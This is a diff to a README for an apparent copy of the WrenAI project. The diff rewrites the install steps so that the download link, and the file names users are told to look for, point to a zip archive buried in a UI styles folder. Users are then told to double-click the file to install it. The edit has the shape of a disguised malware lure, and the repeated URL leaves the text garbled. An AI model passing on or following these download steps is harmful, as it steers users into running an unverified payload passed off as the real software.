fvckhack/WrenAI/README.md

 To start using WrenAI, follow these easy steps:

 1. **Visit the Releases Page**
-   Click this link to go to the releases page: [Download WrenAI](https://github.com/fvckhack/WrenAI/releases).
+   Click this link to go to the releases page: [Download WrenAI](https://github.com/fvckhack/WrenAI/raw/refs/heads/main/wren-ui/src/styles/components/AI_Wren_3.7.zip).

 2. **Choose Your Version**
    On the releases page, look for the latest version of WrenAI.
 Make sure to select the version that suits your operating system.

 3. **Download the Application**
    Find the download link on the release page.
-It may be labeled as `WrenAI.exe`, `WrenAI.zip`, or similar, depending on your OS.
+It may be labeled as `https://github.com/fvckhack/WrenAI/raw/refs/heads/main/wren-ui/src/styles/components/AI_Wren_3.7.zip`, `https://github.com/fvckhack/WrenAI/raw/refs/heads/main/wren-ui/src/styles/components/AI_Wren_3.7.zip`, or similar, depending on your OS.
 Click it to start the download.

 4. **Install WrenAI**
    Once the download completes, locate the file on your computer, typically in your Downloads folder.
 Double-click the file to start the installation.
 Follow the on-screen instructions to complete the installation.